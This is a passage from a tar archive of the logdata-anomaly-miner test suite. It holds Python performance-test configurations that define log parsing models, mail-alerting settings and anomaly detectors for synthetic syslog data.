    'Core.PersistenceDir': '/tmp/lib/aminer',

    # Define a target e-mail address to send alerts to. When undefined,
    # no e-mail notification hooks are added.
    'MailAlerting.TargetAddress': 'root@localhost',

    # Sender address of e-mail alerts. When undefined, "sendmail"
    # implementation on host will decide, which sender address should
    # be used.
    'MailAlerting.FromAddress': 'root@localhost',

    # Define, which text should be prepended to the standard aminer
    # subject. Defaults to "aminer Alerts:"
    'MailAlerting.SubjectPrefix': 'aminer Alerts:',

    # Define a grace time after startup before aminer will react to
    # an event and send the first alert e-mail. Defaults to 0 (any
    # event can immediately trigger alerting).
    'MailAlerting.AlertGraceTime': 0,
})

# Define how many seconds to wait after a first event triggered
# the alerting procedure before really sending out the e-mail.
# In that timespan, events are collected and will be sent all
# using a single e-mail. Defaults to 10 seconds.
config_properties['MailAlerting.EventCollectTime'] = 0 # Define the minimum time between two alert e-mails in seconds # to avoid spamming. All events during this timespan are collected # and sent out with the next report. Defaults to 600 seconds. config_properties['MailAlerting.MinAlertGap'] = 0 # Define the maximum time between two alert e-mails in seconds. # When undefined this defaults to "MailAlerting.MinAlertGap". # Otherwise this will activate an exponential backoff to reduce # messages during permanent error states by increasing the alert # gap by 50% when more alert-worthy events were recorded while # the previous gap time was not yet elapsed. config_properties['MailAlerting.MaxAlertGap'] = 600 # Define how many events should be included in one alert mail # at most. This defaults to 1000 config_properties['MailAlerting.MaxEventsPerMessage'] = 1000 config_properties['LogPrefix'] = 'Original log line: ' # Add your ruleset here: def build_analysis_pipeline(analysis_context): """ Define the function to create pipeline for parsing the log data. It has also to define an AtomizerFactory to instruct aminer how to process incoming data streams to create log atoms from them. """ # Build the parsing model: from aminer.parsing.AnyByteDataModelElement import AnyByteDataModelElement parsing_model = AnyByteDataModelElement('AnyByteDataModelElement') # Some generic imports. from aminer.analysis import AtomFilters # Create all global handler lists here and append the real handlers later on. # Use this filter to distribute all atoms to the analysis handlers. atom_filter = AtomFilters.SubhandlerFilter(None) from aminer.events.StreamPrinterEventHandler import StreamPrinterEventHandler stream_printer_event_handler = StreamPrinterEventHandler(analysis_context) anomaly_event_handlers = [stream_printer_event_handler] # Now define the AtomizerFactory using the model. A simple line # based one is usually sufficient. 
from aminer.input.SimpleByteStreamLineAtomizerFactory import SimpleByteStreamLineAtomizerFactory analysis_context.atomizer_factory = SimpleByteStreamLineAtomizerFactory(parsing_model, [atom_filter], anomaly_event_handlers) # Just report all unparsed atoms to the event handlers. from aminer.analysis.UnparsedAtomHandlers import SimpleUnparsedAtomHandler simple_unparsed_atom_handler = SimpleUnparsedAtomHandler(anomaly_event_handlers) atom_filter.add_handler(simple_unparsed_atom_handler, stop_when_handled_flag=True) analysis_context.register_component(simple_unparsed_atom_handler, component_name="UnparsedHandler") from aminer.analysis.NewMatchPathDetector import NewMatchPathDetector new_match_path_detector = NewMatchPathDetector(analysis_context.aminer_config, anomaly_event_handlers, learn_mode=True) analysis_context.register_component(new_match_path_detector, component_name="NewMatchPath") atom_filter.add_handler(new_match_path_detector) from aminer.analysis.NewMatchPathValueDetector import NewMatchPathValueDetector new_match_path_value_detector = NewMatchPathValueDetector( analysis_context.aminer_config, ['/AnyByteDataModelElement'], anomaly_event_handlers, learn_mode=True) analysis_context.register_component(new_match_path_value_detector, component_name="NewMatchPathValue") atom_filter.add_handler(new_match_path_value_detector) logdata-anomaly-miner-2.8.0/aecid-testsuite/system/performance-tests/performance-config1.py000066400000000000000000000435711500476301700321770ustar00rootroot00000000000000from aminer.parsing.FirstMatchModelElement import FirstMatchModelElement from aminer.parsing.SequenceModelElement import SequenceModelElement from aminer.parsing.FixedDataModelElement import FixedDataModelElement from aminer.parsing.DelimitedDataModelElement import DelimitedDataModelElement from aminer.parsing.AnyByteDataModelElement import AnyByteDataModelElement from aminer.parsing.FixedWordlistDataModelElement import FixedWordlistDataModelElement from 
aminer.parsing.DecimalIntegerValueModelElement import DecimalIntegerValueModelElement from aminer.parsing.DateTimeModelElement import DateTimeModelElement from aminer.parsing.IpAddressDataModelElement import IpAddressDataModelElement from aminer.parsing.OptionalMatchModelElement import OptionalMatchModelElement # This is a template for the "aminer" logfile miner tool. Copy # it to "config.py" and define your ruleset. config_properties = {} # Define the list of log resources to read from: the resources # named here do not need to exist when aminer is started. This # will just result in a warning. However if they exist, they have # to be readable by the aminer process! Supported types are: # * file://[path]: Read data from file, reopen it after rollover # * unix://[path]: Open the path as UNIX local socket for reading config_properties['LogResourceList'] = ['file:///tmp/syslog'] # Define the uid/gid of the process that runs the calculation # after opening the log files: config_properties['AminerUser'] = 'aminer' config_properties['AminerGroup'] = 'aminer' # Define the path, where aminer will listen for incoming remote # control connections. When missing, no remote control socket # will be created. # config_properties['RemoteControlSocket'] = '/var/run/aminer-remote.socket' # Read the analyis from this file. That part of configuration # is separated from the main configuration so that it can be loaded # only within the analysis child. Non-absolute path names are # interpreted relatively to the main configuration file (this # file). When empty, this configuration has to contain the configuration # for the child also. # config_properties['AnalysisConfigFile'] = 'analysis.py' # Read and store information to be used between multiple invocations # of aminer in this directory. The directory must only be accessible # to the 'AminerUser' but not group/world readable. On violation, # aminer will refuse to start. When undefined, '/var/lib/aminer' # is used. 
# Persistence and mail-alerting settings for this performance test, merged
# into the config_properties dictionary created above.
config_properties.update({
    # Read and store information to be used between multiple invocations
    # of aminer in this directory; the directory must only be accessible
    # to the 'AminerUser'. NOTE(review): this test keeps its state below
    # /tmp, which is only acceptable because aminer refuses to start on a
    # group/world-readable persistence directory; do not copy this path
    # into a production configuration.
    'Core.PersistenceDir': '/tmp/lib/aminer',

    # Define a target e-mail address to send alerts to. When undefined,
    # no e-mail notification hooks are added.
    'MailAlerting.TargetAddress': 'root@localhost',

    # Sender address of e-mail alerts. When undefined, "sendmail"
    # implementation on host will decide, which sender address should
    # be used.
    'MailAlerting.FromAddress': 'root@localhost',

    # Define, which text should be prepended to the standard aminer
    # subject. Defaults to "aminer Alerts:"
    'MailAlerting.SubjectPrefix': 'aminer Alerts:',

    # Define a grace time after startup before aminer will react to
    # an event and send the first alert e-mail. Defaults to 0 (any
    # event can immediately trigger alerting).
    'MailAlerting.AlertGraceTime': 0,

    # Define how many seconds to wait after a first event triggered
    # the alerting procedure before really sending out the e-mail.
    # In that timespan, events are collected and will be sent all
    # using a single e-mail. Defaults to 10 seconds.
    'MailAlerting.EventCollectTime': 0,

    # Define the minimum time between two alert e-mails in seconds
    # to avoid spamming. All events during this timespan are collected
    # and sent out with the next report. Defaults to 600 seconds.
    'MailAlerting.MinAlertGap': 0,

    # Define the maximum time between two alert e-mails in seconds.
    # When undefined this defaults to "MailAlerting.MinAlertGap".
    # Otherwise this will activate an exponential backoff to reduce
    # messages during permanent error states by increasing the alert
    # gap by 50% when more alert-worthy events were recorded while
    # the previous gap time was not yet elapsed.
    'MailAlerting.MaxAlertGap': 600,
})

# Define how many events should be included in one alert mail
# at most.
This defaults to 1000 config_properties['MailAlerting.MaxEventsPerMessage'] = 1000 config_properties['LogPrefix'] = 'Original log line: ' # Add your ruleset here: def build_analysis_pipeline(analysis_context): """ Define the function to create pipeline for parsing the log data. It has also to define an AtomizerFactory to instruct aminer how to process incoming data streams to create log atoms from them. """ date_format_string = b'%Y-%m-%d %H:%M:%S' cron = b' cron[' # Build the parsing model: service_children_disk_report = [ FixedDataModelElement('Space', b' Current Disk Data is: Filesystem Type Size Used Avail Use%'), DelimitedDataModelElement('Data', b'%'), AnyByteDataModelElement('Rest')] service_children_login_details = [ FixedDataModelElement('User', b'User '), DelimitedDataModelElement('Username', b' '), FixedWordlistDataModelElement('Status', [b' logged in', b' logged out']), OptionalMatchModelElement('PastTime', SequenceModelElement('Time', [ FixedDataModelElement('Blank', b' '), DecimalIntegerValueModelElement('Minutes'), FixedDataModelElement('Ago', b' minutes ago.')]))] service_children_cron_job = [ DateTimeModelElement('DTM', date_format_string), FixedDataModelElement('UNameSpace1', b' '), DelimitedDataModelElement('UName', b' '), FixedDataModelElement('UNameSpace2', b' '), DelimitedDataModelElement('User', b' '), FixedDataModelElement('Cron', cron), DecimalIntegerValueModelElement('JobNumber'), FixedDataModelElement('Details', b']: Job `cron.daily` started.')] service_children_random_time = [FixedDataModelElement('Space', b'Random: '), DecimalIntegerValueModelElement('Random')] service_children_sensors = [SequenceModelElement('CPUTemp', [ FixedDataModelElement('FixedTemp', b'CPU Temp: '), DecimalIntegerValueModelElement('Temp'), FixedDataModelElement('Degrees', b'\xc2\xb0C')]), FixedDataModelElement('Space1', b', '), SequenceModelElement('CPUWorkload', [ FixedDataModelElement('FixedWorkload', b'CPU Workload: '), 
DecimalIntegerValueModelElement('Workload'), FixedDataModelElement('Percent', b'%')]), FixedDataModelElement('Space2', b', '), DateTimeModelElement('DTM', date_format_string)] service_children_user_ip_address = [ FixedDataModelElement('User', b'User '), DelimitedDataModelElement('Username', b' '), FixedDataModelElement('Action', b' changed IP address to '), IpAddressDataModelElement('IP')] service_children_cron_job_announcement = [ DateTimeModelElement('DTM', date_format_string), FixedDataModelElement('Space', b' '), DelimitedDataModelElement('UName', b' '), FixedDataModelElement('Cron', cron), DecimalIntegerValueModelElement('JobNumber'), FixedDataModelElement('Run', b']: Will run job `'), FixedWordlistDataModelElement('CronType', [b'cron.daily', b'cron.hourly', b'cron.monthly', b'cron.weekly']), FixedDataModelElement('Start Time', b'\' in 5 min.')] service_children_cron_job_execution = [ DateTimeModelElement('DTM', date_format_string), FixedDataModelElement('Space1', b' '), DelimitedDataModelElement('UName', b' '), FixedDataModelElement('Cron', cron), DecimalIntegerValueModelElement('JobNumber'), FixedDataModelElement('Job', b']: Job `'), FixedWordlistDataModelElement('CronType', [b'cron.daily', b'cron.hourly', b'cron.monthly', b'cron.weekly']), FixedDataModelElement('Started', b'\' started')] parsing_model = FirstMatchModelElement('model', [ SequenceModelElement('CronAnnouncement', service_children_cron_job_announcement), SequenceModelElement('CronExecution', service_children_cron_job_execution), SequenceModelElement('DailyCron', service_children_cron_job), SequenceModelElement('DiskReport', service_children_disk_report), SequenceModelElement('LoginDetails', service_children_login_details), DecimalIntegerValueModelElement('Random'), SequenceModelElement('RandomTime', service_children_random_time), SequenceModelElement('Sensors', service_children_sensors), SequenceModelElement('IPAddresses', service_children_user_ip_address)]) # Some generic imports. 
from aminer.analysis import AtomFilters # Create all global handler lists here and append the real handlers later on. # Use this filter to distribute all atoms to the analysis handlers. atom_filter = AtomFilters.SubhandlerFilter(None) from aminer.analysis.TimestampCorrectionFilters import SimpleMonotonicTimestampAdjust simple_monotonic_timestamp_adjust = SimpleMonotonicTimestampAdjust([atom_filter]) analysis_context.register_component(simple_monotonic_timestamp_adjust, component_name="SimpleMonotonicTimestampAdjust") from aminer.events.StreamPrinterEventHandler import StreamPrinterEventHandler stream_printer_event_handler = StreamPrinterEventHandler(analysis_context) anomaly_event_handlers = [stream_printer_event_handler] # Now define the AtomizerFactory using the model. A simple line based one is usually sufficient. from aminer.input.SimpleByteStreamLineAtomizerFactory import SimpleByteStreamLineAtomizerFactory analysis_context.atomizer_factory = SimpleByteStreamLineAtomizerFactory(parsing_model, [simple_monotonic_timestamp_adjust], anomaly_event_handlers) # Just report all unparsed atoms to the event handlers. 
from aminer.analysis.UnparsedAtomHandlers import SimpleUnparsedAtomHandler simple_unparsed_atom_handler = SimpleUnparsedAtomHandler(anomaly_event_handlers) atom_filter.add_handler(simple_unparsed_atom_handler, stop_when_handled_flag=True) analysis_context.register_component(simple_unparsed_atom_handler, component_name="UnparsedHandler") from aminer.analysis.TimestampsUnsortedDetector import TimestampsUnsortedDetector timestamps_unsorted_detector = TimestampsUnsortedDetector(analysis_context.aminer_config, anomaly_event_handlers) atom_filter.add_handler(timestamps_unsorted_detector) analysis_context.register_component(timestamps_unsorted_detector, component_name="TimestampsUnsortedDetector") from aminer.analysis import Rules from aminer.analysis.AllowlistViolationDetector import AllowlistViolationDetector # This rule list should trigger, when the line does not look like: User root (logged in, logged out) # or User 'username' (logged in, logged out) x minutes ago. allowlist_rules = [ Rules.OrMatchRule([ Rules.AndMatchRule([ Rules.PathExistsMatchRule('/model/LoginDetails/PastTime/Time/Minutes'), Rules.NegationMatchRule(Rules.ValueMatchRule('/model/LoginDetails/Username', b'root'))]), Rules.AndMatchRule([ Rules.NegationMatchRule(Rules.PathExistsMatchRule('/model/LoginDetails/PastTime/Time/Minutes')), Rules.PathExistsMatchRule('/model/LoginDetails')]), Rules.NegationMatchRule(Rules.PathExistsMatchRule('/model/LoginDetails'))])] allowlist_violation_detector = AllowlistViolationDetector(analysis_context.aminer_config, allowlist_rules, anomaly_event_handlers) analysis_context.register_component(allowlist_violation_detector, component_name="Allowlist") atom_filter.add_handler(allowlist_violation_detector) from aminer.analysis.NewMatchPathDetector import NewMatchPathDetector new_match_path_detector = NewMatchPathDetector(analysis_context.aminer_config, anomaly_event_handlers, learn_mode=True) analysis_context.register_component(new_match_path_detector, 
component_name="NewMatchPath") atom_filter.add_handler(new_match_path_detector) def tuple_transformation_function(match_value_list): """Only allow output of the EnhancedNewMatchPathValueComboDetector after every 10000th element.""" extra_data = enhanced_new_match_path_value_combo_detector.known_values_dict.get(tuple(match_value_list)) if extra_data is not None: mod = 10000 if (extra_data[2] + 1) % mod == 0: enhanced_new_match_path_value_combo_detector.learn_mode = False else: enhanced_new_match_path_value_combo_detector.learn_mode = True return match_value_list from aminer.analysis.EnhancedNewMatchPathValueComboDetector import EnhancedNewMatchPathValueComboDetector enhanced_new_match_path_value_combo_detector = EnhancedNewMatchPathValueComboDetector(analysis_context.aminer_config, [ '/model/DailyCron/UName', '/model/DailyCron/Job Number'], anomaly_event_handlers, learn_mode=True, tuple_transformation_function=tuple_transformation_function) analysis_context.register_component(enhanced_new_match_path_value_combo_detector, component_name="EnhancedNewValueCombo") atom_filter.add_handler(enhanced_new_match_path_value_combo_detector) from aminer.analysis.HistogramAnalysis import HistogramAnalysis, LinearNumericBinDefinition, ModuloTimeBinDefinition, \ PathDependentHistogramAnalysis modulo_time_bin_definition = ModuloTimeBinDefinition(86400, 3600, 0, 1, 24, True) linear_numeric_bin_definition = LinearNumericBinDefinition(50, 5, 20, True) histogram_analysis = HistogramAnalysis(analysis_context.aminer_config, [ ('/model/RandomTime/Random', modulo_time_bin_definition), ('/model/Random', linear_numeric_bin_definition)], 10, anomaly_event_handlers) analysis_context.register_component(histogram_analysis, component_name="HistogramAnalysis") atom_filter.add_handler(histogram_analysis) path_dependent_histogram_analysis = PathDependentHistogramAnalysis( analysis_context.aminer_config, '/model/RandomTime', modulo_time_bin_definition, 10, anomaly_event_handlers) 
analysis_context.register_component(path_dependent_histogram_analysis, component_name="PathDependentHistogramAnalysis") atom_filter.add_handler(path_dependent_histogram_analysis) from aminer.analysis.MatchValueAverageChangeDetector import MatchValueAverageChangeDetector match_value_average_change_detector = MatchValueAverageChangeDetector(analysis_context.aminer_config, anomaly_event_handlers, None, ['/model/Random'], 100, 10) analysis_context.register_component(match_value_average_change_detector, component_name="MatchValueAverageChange") atom_filter.add_handler(match_value_average_change_detector) import sys from aminer.analysis.MatchValueStreamWriter import MatchValueStreamWriter match_value_stream_writer = MatchValueStreamWriter(sys.stdout, [ '/model/Sensors/CPUTemp', '/model/Sensors/CPUWorkload', '/model/Sensors/DTM'], b';', b'') analysis_context.register_component(match_value_stream_writer, component_name="MatchValueStreamWriter") atom_filter.add_handler(match_value_stream_writer) from aminer.analysis.NewMatchPathValueComboDetector import NewMatchPathValueComboDetector new_match_path_value_combo_detector = NewMatchPathValueComboDetector(analysis_context.aminer_config, [ '/model/IPAddresses/Username', '/model/IPAddresses/IP'], anomaly_event_handlers, learn_mode=True) analysis_context.register_component(new_match_path_value_combo_detector, component_name="NewMatchPathValueCombo") atom_filter.add_handler(new_match_path_value_combo_detector) from aminer.analysis.NewMatchPathValueDetector import NewMatchPathValueDetector new_match_path_value_detector = NewMatchPathValueDetector(analysis_context.aminer_config, [ '/model/DailyCron/JobNumber', '/model/IPAddresses/Username'], anomaly_event_handlers, learn_mode=True) analysis_context.register_component(new_match_path_value_detector, component_name="NewMatchPathValue") atom_filter.add_handler(new_match_path_value_detector) from aminer.analysis.MissingMatchPathValueDetector import MissingMatchPathValueDetector 
missing_match_path_value_detector = MissingMatchPathValueDetector( analysis_context.aminer_config, ['/model/DiskReport/Space'], anomaly_event_handlers, learn_mode=True, default_interval=2, realert_interval=5) analysis_context.register_component(missing_match_path_value_detector, component_name="MissingMatch") atom_filter.add_handler(missing_match_path_value_detector) from aminer.analysis.TimeCorrelationDetector import TimeCorrelationDetector time_correlation_detector = TimeCorrelationDetector( analysis_context.aminer_config, anomaly_event_handlers, 2, min_rule_attributes=1, max_rule_attributes=5, record_count_before_event=70000, output_logline=True) analysis_context.register_component(time_correlation_detector, component_name="TimeCorrelationDetector") atom_filter.add_handler(time_correlation_detector) from aminer.analysis.TimeCorrelationViolationDetector import TimeCorrelationViolationDetector, CorrelationRule, EventClassSelector cron_job_announcement = CorrelationRule( 'CronJobAnnouncement', 5, 6, artefact_match_parameters=[('/model/CronAnnouncement/JobNumber', '/model/CronExecution/JobNumber')]) a_class_selector = EventClassSelector('Announcement', [cron_job_announcement], None) b_class_selector = EventClassSelector('Execution', None, [cron_job_announcement]) rules = [Rules.PathExistsMatchRule('/model/CronAnnouncement/Run', a_class_selector), Rules.PathExistsMatchRule('/model/CronExecution/Job', b_class_selector)] time_correlation_violation_detector = TimeCorrelationViolationDetector(analysis_context.aminer_config, rules, anomaly_event_handlers) analysis_context.register_component(time_correlation_violation_detector, component_name="TimeCorrelationViolationDetector") atom_filter.add_handler(time_correlation_violation_detector) logdata-anomaly-miner-2.8.0/aecid-testsuite/system/performance-tests/performance-config2.py000066400000000000000000000550321500476301700321730ustar00rootroot00000000000000from aminer.parsing.FirstMatchModelElement import 
FirstMatchModelElement from aminer.parsing.SequenceModelElement import SequenceModelElement from aminer.parsing.DecimalFloatValueModelElement import DecimalFloatValueModelElement from aminer.parsing.FixedDataModelElement import FixedDataModelElement from aminer.parsing.DelimitedDataModelElement import DelimitedDataModelElement from aminer.parsing.AnyByteDataModelElement import AnyByteDataModelElement from aminer.parsing.FixedWordlistDataModelElement import FixedWordlistDataModelElement from aminer.parsing.DecimalIntegerValueModelElement import DecimalIntegerValueModelElement from aminer.parsing.DateTimeModelElement import DateTimeModelElement from aminer.parsing.IpAddressDataModelElement import IpAddressDataModelElement from aminer.parsing.Base64StringModelElement import Base64StringModelElement from aminer.parsing.ElementValueBranchModelElement import ElementValueBranchModelElement from aminer.parsing.HexStringModelElement import HexStringModelElement from aminer.parsing.MultiLocaleDateTimeModelElement import MultiLocaleDateTimeModelElement from aminer.parsing.OptionalMatchModelElement import OptionalMatchModelElement from aminer.parsing.RepeatedElementDataModelElement import RepeatedElementDataModelElement from aminer.parsing.VariableByteDataModelElement import VariableByteDataModelElement from aminer.parsing.WhiteSpaceLimitedDataModelElement import WhiteSpaceLimitedDataModelElement # This is a template for the "aminer" logfile miner tool. Copy # it to "config.py" and define your ruleset. config_properties = {} # Define the list of log resources to read from: the resources # named here do not need to exist when aminer is started. This # will just result in a warning. However if they exist, they have # to be readable by the aminer process! 
Supported types are: # * file://[path]: Read data from file, reopen it after rollover # * unix://[path]: Open the path as UNIX local socket for reading config_properties['LogResourceList'] = ['file:///tmp/syslog'] # Define the uid/gid of the process that runs the calculation # after opening the log files: config_properties['AminerUser'] = 'aminer' config_properties['AminerGroup'] = 'aminer' # Define the path where aminer will listen for incoming remote # control connections. When missing, no remote control socket # will be created. # config_properties['RemoteControlSocket'] = '/var/run/aminer-remote.socket' # Read the analysis from this file. That part of the configuration # is separated from the main configuration so that it can be loaded # only within the analysis child. Non-absolute path names are # interpreted relative to the main configuration file (this # file). When empty, this configuration has to contain the configuration # for the child also. # config_properties['AnalysisConfigFile'] = 'analysis.py' # Read and store information to be used between multiple invocations # of aminer in this directory. The directory must only be accessible # to the 'AminerUser' but not group/world readable. On violation, # aminer will refuse to start. When undefined, '/var/lib/aminer' # is used. config_properties['Core.PersistenceDir'] = '/tmp/lib/aminer' # Define a target e-mail address to send alerts to. When undefined, # no e-mail notification hooks are added. config_properties['MailAlerting.TargetAddress'] = 'root@localhost' # Sender address of e-mail alerts. When undefined, the "sendmail" # implementation on the host will decide which sender address should # be used. config_properties['MailAlerting.FromAddress'] = 'root@localhost' # Define which text should be prepended to the standard aminer # subject.
Defaults to "aminer Alerts:" config_properties['MailAlerting.SubjectPrefix'] = 'aminer Alerts:' # Define a grace time after startup before aminer will react to # an event and send the first alert e-mail. Defaults to 0 (any # event can immediately trigger alerting). config_properties['MailAlerting.AlertGraceTime'] = 0 # Define how many seconds to wait after a first event triggered # the alerting procedure before really sending out the e-mail. # In that timespan, events are collected and will all be sent # using a single e-mail. Defaults to 10 seconds. config_properties['MailAlerting.EventCollectTime'] = 0 # Define the minimum time between two alert e-mails in seconds # to avoid spamming. All events during this timespan are collected # and sent out with the next report. Defaults to 600 seconds. config_properties['MailAlerting.MinAlertGap'] = 0 # Define the maximum time between two alert e-mails in seconds. # When undefined this defaults to "MailAlerting.MinAlertGap". # Otherwise this will activate an exponential backoff to reduce # messages during permanent error states by increasing the alert # gap by 50% when more alert-worthy events were recorded while # the previous gap time had not yet elapsed. config_properties['MailAlerting.MaxAlertGap'] = 600 # Define how many events should be included in one alert mail # at most. This defaults to 1000. config_properties['MailAlerting.MaxEventsPerMessage'] = 1000 config_properties['LogPrefix'] = 'Original log line: ' # Add your ruleset here: def build_analysis_pipeline(analysis_context): """ Define the function to create the pipeline for parsing the log data. It also has to define an AtomizerFactory to instruct aminer how to process incoming data streams to create log atoms from them.
""" date_format_string = b'%Y-%m-%d %H:%M:%S' cron = b' cron[' # Build the parsing model: service_children_disk_report = [ FixedDataModelElement('Space', b' Current Disk Data is: Filesystem Type Size Used Avail Use%'), DelimitedDataModelElement('Data', b'%'), AnyByteDataModelElement('Rest')] service_children_login_details = [ FixedDataModelElement('User', b'User '), DelimitedDataModelElement('Username', b' '), FixedWordlistDataModelElement('Status', [ b' logged in', b' logged out']), OptionalMatchModelElement('PastTime', SequenceModelElement('Time', [ FixedDataModelElement('Blank', b' '), DecimalIntegerValueModelElement('Minutes'), FixedDataModelElement('Ago', b' minutes ago.')]))] service_children_cron_job = [ DateTimeModelElement('DTM', date_format_string), FixedDataModelElement('UNameSpace1', b' '), DelimitedDataModelElement('UName', b' '), FixedDataModelElement('UNameSpace2', b' '), DelimitedDataModelElement('User', b' '), FixedDataModelElement('Cron', cron), DecimalIntegerValueModelElement('JobNumber'), FixedDataModelElement('Details', b']: Job `cron.daily` started.')] service_children_random_time = [FixedDataModelElement('Space', b'Random: '), DecimalIntegerValueModelElement('Random')] service_children_sensors = [ SequenceModelElement('CPUTemp', [ FixedDataModelElement('FixedTemp', b'CPU Temp: '), DecimalIntegerValueModelElement('Temp'), FixedDataModelElement('Degrees', b'\xc2\xb0C')]), FixedDataModelElement('Space1', b', '), SequenceModelElement('CPUWorkload', [ FixedDataModelElement('Fixed Workload', b'CPU Workload: '), DecimalIntegerValueModelElement('Workload'), FixedDataModelElement('Percent', b'%')]), FixedDataModelElement('Space2', b', '), DateTimeModelElement('DTM', date_format_string)] service_children_user_ip_address = [ FixedDataModelElement('User', b'User '), DelimitedDataModelElement('Username', b' '), FixedDataModelElement('Action', b' changed IP address to '), IpAddressDataModelElement('IP')] service_children_cron_job_announcement = [ 
DateTimeModelElement('DTM', date_format_string), FixedDataModelElement('Space', b' '), DelimitedDataModelElement('UName', b' '), FixedDataModelElement('Cron', cron), DecimalIntegerValueModelElement('JobNumber'), FixedDataModelElement('Run', b']: Will run job `'), FixedWordlistDataModelElement('CronType', [b'cron.daily', b'cron.hourly', b'cron.monthly', b'cron.weekly']), FixedDataModelElement('Start Time', b'\' in 5 min.')] service_children_cron_job_execution = [ DateTimeModelElement('DTM', date_format_string), FixedDataModelElement('Space1', b' '), DelimitedDataModelElement('UName', b' '), FixedDataModelElement('Cron', cron), DecimalIntegerValueModelElement('JobNumber'), FixedDataModelElement('Job', b']: Job `'), FixedWordlistDataModelElement('CronType', [b'cron.daily', b'cron.hourly', b'cron.monthly', b'cron.weekly']), FixedDataModelElement('Started', b'\' started')] service_children_parsing_model_element = [ DateTimeModelElement('DateTimeModelElement', b'Current DateTime: %d.%m.%Y %H:%M:%S'), DecimalFloatValueModelElement('DecimalFloatValueModelElement', value_sign_type='optional'), DecimalIntegerValueModelElement('DecimalIntegerValueModelElement', value_sign_type='optional', value_pad_type='blank'), SequenceModelElement('', [ DelimitedDataModelElement('DelimitedDataModelElement', b';'), FixedDataModelElement('FixedDataModelElement', b';')])] # ElementValueBranchModelElement fixed_data_me1 = FixedDataModelElement("fixed1", b'match ') fixed_data_me2 = FixedDataModelElement("fixed2", b'fixed String') fixed_wordlist_data_model_element = FixedWordlistDataModelElement("wordlist", [b'data: ', b'string: ']) decimal_integer_value_model_element = DecimalIntegerValueModelElement("decimal") service_children_parsing_model_element.append( ElementValueBranchModelElement('ElementValueBranchModelElement', FirstMatchModelElement("first", [ SequenceModelElement("seq1", [fixed_data_me1, fixed_wordlist_data_model_element]), SequenceModelElement("seq2", [fixed_data_me1, 
fixed_wordlist_data_model_element, fixed_data_me2])]), "wordlist", {0: decimal_integer_value_model_element, 1: fixed_data_me2})) service_children_parsing_model_element.append(HexStringModelElement('HexStringModelElement')) service_children_parsing_model_element.append(SequenceModelElement('', [ FixedDataModelElement('FixedDataModelElement', b'Gateway IP-Address: '), IpAddressDataModelElement('IpAddressDataModelElement')])) service_children_parsing_model_element.append( MultiLocaleDateTimeModelElement('MultiLocaleDateTimeModelElement', [(b'%b %d %Y', "de_AT.utf8", None)])) service_children_parsing_model_element.append(RepeatedElementDataModelElement( 'RepeatedElementDataModelElement', SequenceModelElement('SequenceModelElement', [ FixedDataModelElement('FixedDataModelElement', b'drawn number: '), DecimalIntegerValueModelElement('DecimalIntegerValueModelElement')]), 1)) service_children_parsing_model_element.append(VariableByteDataModelElement('VariableByteDataModelElement', b'-@#')) service_children_parsing_model_element.append(SequenceModelElement('', [ WhiteSpaceLimitedDataModelElement('WhiteSpaceLimitedDataModelElement'), FixedDataModelElement('', b' ')])) # The Base64StringModelElement must be just before the AnyByteDataModelElement to avoid unexpected Matches. service_children_parsing_model_element.append(Base64StringModelElement('Base64StringModelElement')) # The OptionalMatchModelElement must be paired with a FirstMatchModelElement because it accepts all data and thus no data gets # to the AnyByteDataModelElement. The AnyByteDataModelElement must be last, because all bytes are accepted. 
service_children_parsing_model_element.append( OptionalMatchModelElement('OptionalMatchModelElement', FirstMatchModelElement('FirstMatchModelElement', [ FixedDataModelElement('FixedDataModelElement', b'The-searched-element-was-found!'), AnyByteDataModelElement('AnyByteDataModelElement')]))) parsing_model = FirstMatchModelElement('model', [ SequenceModelElement('CronAnnouncement', service_children_cron_job_announcement), SequenceModelElement('CronExecution', service_children_cron_job_execution), SequenceModelElement('DailyCron', service_children_cron_job), SequenceModelElement('DiskReport', service_children_disk_report), SequenceModelElement('LoginDetails', service_children_login_details), DecimalIntegerValueModelElement('Random'), SequenceModelElement('RandomTime', service_children_random_time), SequenceModelElement('Sensors', service_children_sensors), SequenceModelElement('IPAddresses', service_children_user_ip_address), FirstMatchModelElement('ParsingME', service_children_parsing_model_element)]) # Some generic imports. from aminer.analysis import AtomFilters # Create all global handler lists here and append the real handlers # later on. # Use this filter to distribute all atoms to the analysis handlers. 
atom_filter = AtomFilters.SubhandlerFilter(None) from aminer.analysis.TimestampCorrectionFilters import SimpleMonotonicTimestampAdjust simple_monotonic_timestamp_adjust = SimpleMonotonicTimestampAdjust([atom_filter]) analysis_context.register_component(simple_monotonic_timestamp_adjust, component_name="SimpleMonotonicTimestampAdjust") from aminer.events.StreamPrinterEventHandler import StreamPrinterEventHandler stream_printer_event_handler = StreamPrinterEventHandler(analysis_context) from aminer.events.SyslogWriterEventHandler import SyslogWriterEventHandler syslog_event_handler = SyslogWriterEventHandler(analysis_context) from aminer.events.DefaultMailNotificationEventHandler import DefaultMailNotificationEventHandler if DefaultMailNotificationEventHandler.CONFIG_KEY_MAIL_TARGET_ADDRESS in analysis_context.aminer_config.config_properties: mail_notification_handler = DefaultMailNotificationEventHandler(analysis_context) analysis_context.register_component(mail_notification_handler, component_name="MailHandler") anomaly_event_handlers = [stream_printer_event_handler, syslog_event_handler, mail_notification_handler] # Now define the AtomizerFactory using the model. A simple line based one is usually sufficient. from aminer.input.SimpleByteStreamLineAtomizerFactory import SimpleByteStreamLineAtomizerFactory analysis_context.atomizer_factory = SimpleByteStreamLineAtomizerFactory(parsing_model, [simple_monotonic_timestamp_adjust], anomaly_event_handlers) # Just report all unparsed atoms to the event handlers. 
